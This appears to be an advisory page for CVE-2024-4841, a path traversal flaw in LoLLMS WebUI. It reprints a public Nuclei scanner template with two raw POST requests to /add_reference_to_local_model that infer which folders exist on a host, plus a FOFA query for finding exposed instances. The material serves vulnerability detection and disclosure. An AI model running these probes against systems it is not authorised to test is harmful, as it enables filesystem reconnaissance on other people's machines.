CVE-2024-4841: LoLLMS WebUI - Subfolder Prediction via Path Traversal

日期: 2025-08-01 | 影响软件: LoLLMS WebUI | POC: 已公开

漏洞描述

A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.

PoC代码[已公开]

id: CVE-2024-4841

info:
  name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
  author: s4e-io
  severity: medium
  description: |
    A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
  impact: |
    By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
  reference:
    - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4841
  classification:
    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2024-4841
    cwe-id: CWE-29
    epss-score: 0.07572
    epss-percentile: 0.91485
  metadata:
    max-request: 1
    fofa-query: "LoLLMS WebUI - Welcome"
  tags: cve,cve2024,lollms-webui,traversal

variables:
  folder: "{{to_upper(rand_text_alpha(10))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"path":"\\Users"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":true}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and

  - raw:
      - |
        POST /add_reference_to_local_model HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"path":"\\{{folder}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207eb926f4ee7abba9fa803c27100ca9023b144cdf3e2a90189ffa138edf926051022100f311696630f14e6d98ff903cb1f3de4b6f06f2c7fd35031be50ee1065037db7b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4841.yaml